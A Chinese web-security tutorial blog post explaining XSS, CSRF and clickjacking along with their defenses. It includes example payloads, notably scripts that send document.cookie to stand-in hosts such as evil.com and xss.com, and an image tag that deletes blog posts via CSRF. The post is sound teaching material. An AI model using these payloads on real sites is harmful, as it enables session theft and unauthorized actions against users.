<!DOCTYPE html>












  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><link rel="manifest" href="/manifest.json">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">



  
  
  <link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">




  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-flash.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">


  <link rel="mask-icon" href="/images/logo.svg?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="转自：https://cloud.tencent.com/developer/article/1136202 安全问题的分类按照所发生的区域分类 后端安全问题：所有发生在后端服务器、应用、服务当中的安全问题 前端安全问题：所有发生在浏览器、单页面应用、Web 页面当中的安全问题  按照团队中哪个角色最适合来修复安全问题分类 后端安全问题：针对这个安全问题，后端最适合来修复 前端安全问题：针对这个安">
<meta name="keywords" content="javascript,前端,ECMAScript">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈前端安全">
<meta property="og:url" content="https://hexo.bangz.me/archives/about-frontend-security.html">
<meta property="og:site_name" content="BangZ&#39;s 梦工厂">
<meta property="og:description" content="转自：https://cloud.tencent.com/developer/article/1136202 安全问题的分类按照所发生的区域分类 后端安全问题：所有发生在后端服务器、应用、服务当中的安全问题 前端安全问题：所有发生在浏览器、单页面应用、Web 页面当中的安全问题  按照团队中哪个角色最适合来修复安全问题分类 后端安全问题：针对这个安全问题，后端最适合来修复 前端安全问题：针对这个安">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/iidyq95w48.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/ow7pa2xmka.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/y3gm5kihsj.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/cc8ci5vca3.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/fsrymnkp3k.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/lzkcgzju99.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/g7y4enjbig.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/42jy9nsxn5.jpeg">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/d4nntcmp9f.png">
<meta property="og:image" content="https://hexo.bangz.me/images/2018/08/wj8yquphly.png">
<meta property="og:updated_time" content="2018-10-01T08:30:09.310Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="浅谈前端安全">
<meta name="twitter:description" content="转自：https://cloud.tencent.com/developer/article/1136202 安全问题的分类按照所发生的区域分类 后端安全问题：所有发生在后端服务器、应用、服务当中的安全问题 前端安全问题：所有发生在浏览器、单页面应用、Web 页面当中的安全问题  按照团队中哪个角色最适合来修复安全问题分类 后端安全问题：针对这个安全问题，后端最适合来修复 前端安全问题：针对这个安">
<meta name="twitter:image" content="https://hexo.bangz.me/images/2018/08/iidyq95w48.png">



  <link rel="alternate" href="/atom.xml" title="BangZ's 梦工厂" type="application/atom+xml">




  <link rel="canonical" href="https://hexo.bangz.me/archives/about-frontend-security.html">



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>浅谈前端安全 | BangZ's 梦工厂</title>
  




<script async src="https://www.googletagmanager.com/gtag/js?id=UA-78277428-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-78277428-2');
</script>






  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">BangZ's 梦工厂</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
      
        <p class="site-subtitle">FutureTech Research Center</p>
      
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-categories">
    <a href="/categories/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives menu-item-active">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-pdf">
    <a href="/pdfs/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-file"></i> <br>PDF</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  
    

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://hexo.bangz.me/archives/about-frontend-security.html">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="BangZ">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/icons/icon-128x128.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="BangZ's 梦工厂">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">浅谈前端安全
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2018-08-10 10:32:54" itemprop="dateCreated datePublished" datetime="2018-08-10T10:32:54+08:00">2018-08-10</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2018-10-01 16:30:09" itemprop="dateModified" datetime="2018-10-01T16:30:09+08:00">2018-10-01</time>
              
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing"><a href="/categories/技术研究/" itemprop="url" rel="index"><span itemprop="name">技术研究</span></a></span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/archives/about-frontend-security.html" class="leancloud_visitors" data-flag-title="浅谈前端安全">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数：</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>转自：<a href="https://cloud.tencent.com/developer/article/1136202" rel="external nofollow noopener noreferrer" target="_blank">https://cloud.tencent.com/developer/article/1136202</a></p>
<h1 id="安全问题的分类"><a href="#安全问题的分类" class="headerlink" title="安全问题的分类"></a>安全问题的分类</h1><h2 id="按照所发生的区域分类"><a href="#按照所发生的区域分类" class="headerlink" title="按照所发生的区域分类"></a>按照所发生的区域分类</h2><ul>
<li>后端安全问题：所有发生在后端服务器、应用、服务当中的安全问题</li>
<li>前端安全问题：所有发生在浏览器、单页面应用、Web 页面当中的安全问题</li>
</ul>
<h2 id="按照团队中哪个角色最适合来修复安全问题分类"><a href="#按照团队中哪个角色最适合来修复安全问题分类" class="headerlink" title="按照团队中哪个角色最适合来修复安全问题分类"></a>按照团队中哪个角色最适合来修复安全问题分类</h2><ul>
<li>后端安全问题：针对这个安全问题，后端最适合来修复</li>
<li>前端安全问题：针对这个安全问题，前端最适合来修复</li>
</ul>
<h2 id="综合以上"><a href="#综合以上" class="headerlink" title="综合以上"></a>综合以上</h2><ul>
<li>前端安全问题：发生在浏览器、前端应用当中或者通常由前端开发工程师来对其进行修复的安全问题<a id="more"></a>
</li>
</ul>
<h2 id="浏览器安全"><a href="#浏览器安全" class="headerlink" title="浏览器安全"></a>浏览器安全</h2><h3 id="同源策略"><a href="#同源策略" class="headerlink" title="同源策略"></a>同源策略</h3><blockquote>
<p>是一种约定，是浏览器最核心也最基本的安全功能，限制了来自不同源的 document 或者脚本，对当前 document 读取或设置某些属性</p>
</blockquote>
<p><img src="/images/2018/08/iidyq95w48.png" alt=""></p>
<ul>
<li>影响 “源” 的因素有：host（域名或者 IP 地址）、子域名、端口、协议</li>
<li>对浏览器来说，DOM、Cookie、XMLHttpRequest 会受到同源策略的限制</li>
</ul>
<h4 id="不受同源策略的标签"><a href="#不受同源策略的标签" class="headerlink" title="不受同源策略的标签"></a>不受同源策略的标签</h4><p><code>&lt;script&gt;、&lt;img&gt;、&lt;iframe&gt;、&lt;link&gt;</code> 等标签都可以跨域加载资源，而不受同源策略的限制</p>
<ul>
<li>这些带 “src” 属性的标签每次加载时，浏览器会发起一次 GET 请求</li>
<li>通过 src 属性加载的资源，浏览器限制了 javascript 的权限，使其不能读、写返回的内容</li>
</ul>
<h1 id="三大前端安全问题"><a href="#三大前端安全问题" class="headerlink" title="三大前端安全问题"></a>三大前端安全问题</h1><h2 id="1、跨站脚本攻击（XSS）"><a href="#1、跨站脚本攻击（XSS）" class="headerlink" title="1、跨站脚本攻击（XSS）"></a>1、跨站脚本攻击（XSS）</h2><h3 id="定义"><a href="#定义" class="headerlink" title="定义"></a>定义</h3><blockquote>
<p>英文全称：Cross Site Script，XSS 攻击，通常指黑客通过 “HTML 注入” 篡改了网页，插入了恶意的脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击</p>
</blockquote>
<h3 id="本质"><a href="#本质" class="headerlink" title="本质"></a>本质</h3><p>是一种“HTML 注入”，用户的数据被当成了 HTML 代码一部分来执行，从而产生了新的语义</p>
<hr>
<h3 id="XSS-的分类"><a href="#XSS-的分类" class="headerlink" title="XSS 的分类"></a>XSS 的分类</h3><h4 id="1、反射型-XSS：将用户输入的数据反射给浏览器。黑客需要诱使用户-“点击”-一个恶意链接，才能攻击成功。"><a href="#1、反射型-XSS：将用户输入的数据反射给浏览器。黑客需要诱使用户-“点击”-一个恶意链接，才能攻击成功。" class="headerlink" title="1、反射型 XSS：将用户输入的数据反射给浏览器。黑客需要诱使用户 “点击” 一个恶意链接，才能攻击成功。"></a>1、反射型 XSS：将用户输入的数据反射给浏览器。黑客需要诱使用户 “点击” 一个恶意链接，才能攻击成功。</h4><p>举个例子：  </p>
<ol>
<li>假设在某购物网站上搜商品，当搜不到商品时会出现<br><img src="/images/2018/08/ow7pa2xmka.png" alt=""></li>
</ol>
<p>此时的 URL 是 <code>https://category.vip.com/suggest.php?keyword=xss&amp;ff=235|12|1|1</code></p>
<ol>
<li>在搜索框输入 <code>&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;</code>  </li>
<li>如果前端页面没有对搜索框的内容进行过滤，而是直接发送，这时，URL 地址栏应该会显示 <code>https://category.vip.com/suggest.php?keyword=&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&amp;ff=235|12|1|1</code>，从而 alert 出 xss，但事实却是已经转码了的：<code>https://category.vip.com/suggest.php?keyword=%3Cscript%3Ealert(%27xss%27)%3C%2Fscript%3E&amp;ff=235|12|1|1</code>  </li>
<li>假设前端页面没有进行处理，那么攻击者就可以通过构造来获取用户的 cookie 的地址，来诱使用户来访问这个地址，比如说 <code>https://category.vip.com/suggest.php?keyword=&lt;script&gt;document.location=&#39;http://xss.com/get?cookie=&#39;+document.cookie&lt;/script&gt;&amp;ff=235|12|1|1</code>  </li>
</ol>
<h4 id="2、存储型-XSS：把用户输入的数据-“存储”-在服务器端，这种-XSS-具有很强的稳定性。"><a href="#2、存储型-XSS：把用户输入的数据-“存储”-在服务器端，这种-XSS-具有很强的稳定性。" class="headerlink" title="2、存储型 XSS：把用户输入的数据 “存储” 在服务器端，这种 XSS 具有很强的稳定性。"></a>2、存储型 XSS：把用户输入的数据 “存储” 在服务器端，这种 XSS 具有很强的稳定性。</h4><p>比如说，黑客写下一篇包含恶意 javascript 代码的博客文章，文章发表后，所有访问该博客文章的用户，都会在浏览器中执行这段恶意的 javascript 代码，黑客把恶意的脚本保存到服务器端</p>
<h4 id="3、DOM-Based-XSS：通过修改页面的-DOM-节点形成的-XSS。"><a href="#3、DOM-Based-XSS：通过修改页面的-DOM-节点形成的-XSS。" class="headerlink" title="3、DOM Based XSS：通过修改页面的 DOM 节点形成的 XSS。"></a>3、DOM Based XSS：通过修改页面的 DOM 节点形成的 XSS。</h4><p>举个例子：<br><img src="/images/2018/08/y3gm5kihsj.png" alt=""></p>
<ol>
<li><p>在输入框中输入内容后点击 write<br><img src="/images/2018/08/cc8ci5vca3.png" alt=""></p>
</li>
<li><p>此时再点击 a 链接<br><img src="/images/2018/08/fsrymnkp3k.png" alt=""></p>
</li>
</ol>
<p><strong> 原理：</strong> 首先用一个单引号闭合掉 href 的第一个单引号，然后插入一个 onclick 事件，最后再用注释符 “//“ 注释掉第二个单引号。点击此链接，脚本将被执行。</p>
<hr>
<h3 id="XSS-Payload-攻击"><a href="#XSS-Payload-攻击" class="headerlink" title="XSS Payload 攻击"></a>XSS Payload 攻击</h3><h4 id="定义-1"><a href="#定义-1" class="headerlink" title="定义"></a>定义</h4><blockquote>
<p>XSS 攻击成功后，攻击者能够对用户当前浏览的页面植入恶意脚本，通过恶意脚本，控制用户的浏览器。这些用以完成各种具体功能的恶意脚本，被称为 XSS Payload。实际上就是 Javascript 脚本（或者 Flash 或其他富客户端的脚本），所以 XSS Payload 能够做到任何 javascript 脚本能实现的功能</p>
</blockquote>
<h4 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h4><ul>
<li>通过读取浏览器的 cookie 对象，从而发起 “cookie 劫持” 攻击</li>
</ul>
<ol>
<li>攻击者首先加载一个远程脚本 <code>http://www.a.com/test.htm?abc=&quot;&gt;&lt;script src=http://www.evil.com/evil.js&gt;&lt;/script&gt;</code></li>
<li>真正的 XSS Payload 写在这个远程脚本中，避免直接在 URL 的参数里写入大量的 Javascript 代码</li>
<li>在 evil.js 中，通过如下代码窃取 cookie <code>var img = document.createElement(&quot;img&quot;);</code></li>
<li><code>img.src = &quot;http://www.evil.com/log?&quot;+escape(document.cookie);</code></li>
<li><code>document.body.appendChild(img);</code></li>
<li>以上代码在页面中插入了一张看不见的图片，同时把 document.cookie 对象作为参数发送到远程服务器中</li>
<li><a href="http://www.evil.com/log" rel="external nofollow noopener noreferrer" target="_blank">http://www.evil.com/log</a> 并不一定要存在，因为这个请求会在远程服务器的 Web 日志中留下记录 <code>127.0.0.1 - - [119/Jul/2010:11:30:42 + 0800] &quot;GET /log?cookie1%3D1234 HTTP/1.1&quot; 404 288</code></li>
</ol>
<ul>
<li>通过模拟 GET、POST 请求操作用户的浏览器（在 “cookie 劫持” 失效时，或者目标用户的网络不能访问互联网等情况时会非常有用）<ol>
<li>假设某博客页面存在 XSS 漏洞，那么可以通过构造 get 请求操作用户浏览器  </li>
<li>假设正常删除博客文章的链接为 <code>http://blog.test.com/manage/entry.do?m=delete&amp;id=1245862</code></li>
<li>对于攻击者来说，只需要知道文章的 id，就能够通过这个请求来删除这篇文章</li>
<li>攻击者可以通过插入一张图片来发起一个 get 请求<br><img src="/images/2018/08/lzkcgzju99.png" alt="">  </li>
<li>攻击者只需要让博客作者执行这段 javascript 代码也就是 XSS Payload，就会删除这篇文章</li>
</ol>
</li>
</ul>
<hr>
<h3 id="XSS-的防御"><a href="#XSS-的防御" class="headerlink" title="XSS 的防御"></a>XSS 的防御</h3><h4 id="1、HttpOnly"><a href="#1、HttpOnly" class="headerlink" title="1、HttpOnly"></a>1、HttpOnly</h4><blockquote>
<p>浏览器禁止页面的 Javascript 访问带有 HttpOnly 属性的 cookie。（实质解决的是：XSS 后的 cookie 劫持攻击）如今已成为一种 “标准” 的做法</p>
</blockquote>
<p>不同语言给 cookie 添加 HttpOnly 的方式不同，比如</p>
<ul>
<li>JavaEE：<code>response.setHeader(&quot;Set-Cookie&quot;,&quot;cookiename=value; Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly&quot;);</code></li>
<li>PHP4：<code>header(&quot;Set-Cookie:hidden=value;httpOnly&quot;);</code></li>
<li>PHP5：<code>setcookie(&quot;abc&quot;,&quot;test&quot;,NULL,NULL,NULL,NULL,TRUE);     //true 为 HttpOnly 属性</code></li>
</ul>
<h4 id="2、输入检查（XSS-Filter）"><a href="#2、输入检查（XSS-Filter）" class="headerlink" title="2、输入检查（XSS Filter）"></a>2、输入检查（XSS Filter）</h4><ul>
<li>原理：让一些基于特殊字符的攻击失效。（常见的 Web 漏洞如 XSS、SQLInjection 等，都要求攻击者构造一些特殊字符）</li>
<li>输入检查的逻辑，必须放在服务器端代码中实现。<em><strong>* 目前 Web 开发的普遍做法，是同时哎客户端 Javascript 中和服务端代码中实现相同的输入检查。客户端的输入检查可以阻挡大部分误操作的正常用户，节约服务器资源。</strong></em></li>
</ul>
<h4 id="3、输出检查"><a href="#3、输出检查" class="headerlink" title="3、输出检查"></a>3、输出检查</h4><blockquote>
<p>在变量输出到 HTML 页面时，使用编码或转义的方式来防御 XSS 攻击</p>
</blockquote>
<ul>
<li>针对 HTML 代码的编码方式：HtmlEncode</li>
<li>PHP：htmlentities()和 htmlspecialchars()两个函数</li>
<li>Javascript：JavascriptEncode（需要使用 “\” 对特殊字符进行转义，同时要求输出的变量必须在引号内部）</li>
<li>在 URL 的 path（路径）或者 search（参数）中输出，使用 URLEncode<br>具体实施可以参考：<a href="http://www.cnblogs.com/lovesong/p/5211667.html" rel="external nofollow noopener noreferrer" target="_blank">http://www.cnblogs.com/lovesong/p/5211667.html</a></li>
</ul>
<hr>
<h3 id="防御-DOM-Based-XSS"><a href="#防御-DOM-Based-XSS" class="headerlink" title="防御 DOM Based XSS"></a>防御 DOM Based XSS</h3><ul>
<li><strong>DOM Based XSS 的形成：</strong> （举个例子）<br><img src="/images/2018/08/g7y4enjbig.png" alt=""></li>
<li><strong> 实质：</strong> 从 Javascript 中输出数据到 HTML 页面里</li>
<li><strong> 这个例子的解决方案：</strong> 做一次 HtmlEncode</li>
</ul>
<p><strong> 防御方法：分语境使用不同的编码函数 </strong></p>
<hr>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p><strong>XSS 漏洞虽然复杂，但是却是可以彻底解决的。在设计解决方案时，应该针对不同场景理解 XSS 攻击的原理，使用不同的方法 </strong></p>
<h2 id="2、CSRF（跨站点请求伪造）"><a href="#2、CSRF（跨站点请求伪造）" class="headerlink" title="2、CSRF（跨站点请求伪造）"></a>2、CSRF（跨站点请求伪造）</h2><h3 id="什么是-CSRF"><a href="#什么是-CSRF" class="headerlink" title="什么是 CSRF"></a>什么是 CSRF</h3><p>首先来看个例子：  </p>
<blockquote>
<p>攻击者首先在自己的域构造一个页面：<code>http://www.a.com/csrf.html</code>，其内容为 <code>&lt;img src=&quot;http://blog.sohu.com/manage/entry.do?m=deleted&amp;id=156714243&quot; /&gt;</code><br>使用了一个 img 标签，其地址指向了删除 Iid 为 156714243 的博客文章<br>然后攻击者诱使目标用户，也就是博客主人访问这个页面<br>用户进去看到一张无法显示的图片，这时自己的那篇博客文章已经被删除了</p>
</blockquote>
<p><strong> 原理：</strong> 在刚才访问 <code>http://www.a.com/csrf.html</code> 页面时，图片标签向服务器发送了一次 get 请求，这次请求导致了博客文章被删除</p>
<p><strong><em>这种删除博客文章的请求，是攻击者伪造的，所以这种攻击就叫做“跨站点请求伪造”</em></strong></p>
<h3 id="CSRF-的原理"><a href="#CSRF-的原理" class="headerlink" title="CSRF 的原理"></a>CSRF 的原理</h3><p><img src="/images/2018/08/42jy9nsxn5.jpeg" alt=""></p>
<p>参考上图，我们可以总结，完成一次 CSRF 攻击，必须满足两个条件</p>
<ol>
<li>用户登录受信任网站 A，并且在本地生成 Cookie</li>
<li>在不登出网站 A 的情况下，访问危险网站 B</li>
</ol>
<h4 id="CSRF-本质"><a href="#CSRF-本质" class="headerlink" title="CSRF 本质"></a>CSRF 本质</h4><blockquote>
<p>CSRF 攻击是攻击者利用用户身份操作用户账户的一种攻击方式</p>
</blockquote>
<h3 id="CSRF-的防御"><a href="#CSRF-的防御" class="headerlink" title="CSRF 的防御"></a>CSRF 的防御</h3><p><strong>CSRF 能攻击成功的本质原因：</strong> 重要操作的所有参数都是可以被攻击者猜测到的</p>
<h4 id="解决方案"><a href="#解决方案" class="headerlink" title="解决方案"></a>解决方案</h4><h5 id="1、验证码"><a href="#1、验证码" class="headerlink" title="1、验证码"></a>1、验证码</h5><p>CSRF 攻击过程中，用户在不知情的情况下构造了网络请求，添加验证码后，强制用户必须与应用进行交互  </p>
<ul>
<li>优点：简洁而有效</li>
<li>缺点：网站不能给所有的操作都加上验证码</li>
</ul>
<h5 id="2、Referer-Check"><a href="#2、Referer-Check" class="headerlink" title="2、Referer Check"></a>2、Referer Check</h5><blockquote>
<p>利用 HTTP 头中的 Referer 判断请求来源是否合法<br>Referer 首部包含了当前请求页面的来源页面的地址</p>
</blockquote>
<ul>
<li>优点：简单易操作（只需要在最后给所有安全敏感的请求统一添加一个拦截器来检查 Referer 的值就行）</li>
<li><p>缺点：服务器并非什么时候都能取到 Referer</p>
<ol>
<li>很多出于保护用户隐私的考虑，限制了 Referer 的发送。</li>
<li>比如从 HTTPS 跳转到 HTTP，出于安全的考虑，浏览器不会发送 Referer</li>
</ol>
</li>
</ul>
<p><strong> 浏览器兼容性 </strong><br><img src="/images/2018/08/d4nntcmp9f.png" alt=""></p>
<p>关于 Referer 的更多详细资料：<a href="https://75team.com/post/everything-you-could-ever-want-to-know-and-more-about-controlling-the-referer-header-fastmail-blog.html" rel="external nofollow noopener noreferrer" target="_blank">https://75team.com/post/everything-you-could-ever-want-to-know-and-more-about-controlling-the-referer-header-fastmail-blog.html</a></p>
<h5 id="3、使用-Anti-CSRF-Token"><a href="#3、使用-Anti-CSRF-Token" class="headerlink" title="3、使用 Anti CSRF Token"></a>3、使用 Anti CSRF Token</h5><ul>
<li>比如一个删除操作的 URL 是：<code>http://host/path/delete?uesrname=abc&amp;item=123</code></li>
<li>保持原参数不变，新增一个参数 Token，Token 值是随机的，不可预测</li>
<li><code>http://host/path/delete?username=abc&amp;item=123&amp;token=[random(seed)]</code>  </li>
</ul>
<p><strong><em>由于 Token 的存在，攻击者无法再构造出一个完整的 URL 实施 CSRF 攻击</em></strong></p>
<ul>
<li>优点：比检查 Referer 方法更安全，并且不涉及用户隐私</li>
<li>缺点：对所有的请求都添加 Token 比较困难</li>
</ul>
<p>更多关于 CSRF 详细可参考：  </p>
<ol>
<li>CSRF 攻击的应对之道：<a href="https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/" rel="external nofollow noopener noreferrer" target="_blank">https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/</a></li>
<li>CSRF 原理剖析：<a href="http://netsecurity.51cto.com/art/200812/102951.htm" rel="external nofollow noopener noreferrer" target="_blank">http://netsecurity.51cto.com/art/200812/102951.htm</a></li>
<li>维基百科 CSRF：<a href="https://en.wikipedia.org/wiki/Cross-site_request_forgery" rel="external nofollow noopener noreferrer" target="_blank">https://en.wikipedia.org/wiki/Cross-site_request_forgery</a></li>
<li>CSRF 实例：<a href="http://netsecurity.51cto.com/art/200812/102925.htm" rel="external nofollow noopener noreferrer" target="_blank">http://netsecurity.51cto.com/art/200812/102925.htm</a></li>
</ol>
<p><strong> 需要注意的点：</strong> </p>
<ol>
<li>Token 需要足够随机，必须用足够安全的随机数生成算法</li>
<li>Token 应该为用户和服务器所共同持有，不能被第三方知晓</li>
<li>Token 可以放在用户的 Session 或者浏览器的 Cookie 中</li>
<li>尽量把 Token 放在表单中，把敏感操作由 GET 改为 POST，以 form 表单的形式提交，可以避免 Token 泄露（比如一个页面：<code>http://host/path/manage?username=abc&amp;token=[random]</code>，在此页面用户需要在这个页面提交表单或者单击 “删除” 按钮，才能完成删除操作，在这种场景下，如果这个页面包含了一张攻击者能指定地址的图片 <code>&lt;img src=&quot;http://evil.com/notexist&quot; /&gt;</code>，则这个页面地址会作为 HTTP 请求的 Refer 发送到 evil.com 的服务器上，从而导致 Token 泄露）</li>
</ol>
<hr>
<h3 id="XSRF-攻击"><a href="#XSRF-攻击" class="headerlink" title="XSRF 攻击"></a>XSRF 攻击</h3><blockquote>
<p>当网站同时存在 XSS 和 CSRF 漏洞时，XSS 可以模拟客户端浏览器执行任意操作，在 XSS 攻击下，攻击者完全可以请求页面后，读取页面内容中的 Token 值，然后再构造出一个合法的请求</p>
</blockquote>
<h3 id="结论"><a href="#结论" class="headerlink" title="结论"></a>结论</h3><p><strong> 安全防御的体系应该是相辅相成、缺一不可的 </strong></p>
<h2 id="3、点击劫持（ClickJacking）"><a href="#3、点击劫持（ClickJacking）" class="headerlink" title="3、点击劫持（ClickJacking）"></a>3、点击劫持（ClickJacking）</h2><h3 id="什么是点击劫持"><a href="#什么是点击劫持" class="headerlink" title="什么是点击劫持"></a>什么是点击劫持</h3><blockquote>
<p>点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的 iframe，覆盖在一个网页上，然后诱使用户在网页上进行操作，此时用户将在不知情的情况下点击透明的 iframe 页面。通过调整 iframe 页面的位置，可以诱使用户恰好点击在 iframe 页面的一些功能性按钮上。</p>
</blockquote>
<h3 id="防御点击劫持：X-Frame-Options"><a href="#防御点击劫持：X-Frame-Options" class="headerlink" title="防御点击劫持：X-Frame-Options"></a>防御点击劫持：X-Frame-Options</h3><p>X-Frame-Options HTTP 响应头是用来给浏览器指示允许一个页面能否在 <code>&lt;frame&gt;、&lt;iframe&gt;、&lt;object&gt;</code> 中展现的标记</p>
<h3 id="有三个可选的值"><a href="#有三个可选的值" class="headerlink" title="有三个可选的值"></a>有三个可选的值</h3><ol>
<li>DENY：浏览器会拒绝当前页面加载任何 frame 页面（即使是相同域名的页面也不允许）</li>
<li>SAMEORIGIN：允许加载 frame 页面，但是 frame 页面的地址只能为同源域名下的页面</li>
<li>ALLOW-FROM：可以加载指定来源的 frame 页面（可以定义 frame 页面的地址）</li>
</ol>
<p><strong> 浏览器的兼容性 </strong><br><img src="/images/2018/08/wj8yquphly.png" alt=""></p>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p><strong> 综合以上三大前端安全，我们可以总结 </strong></p>
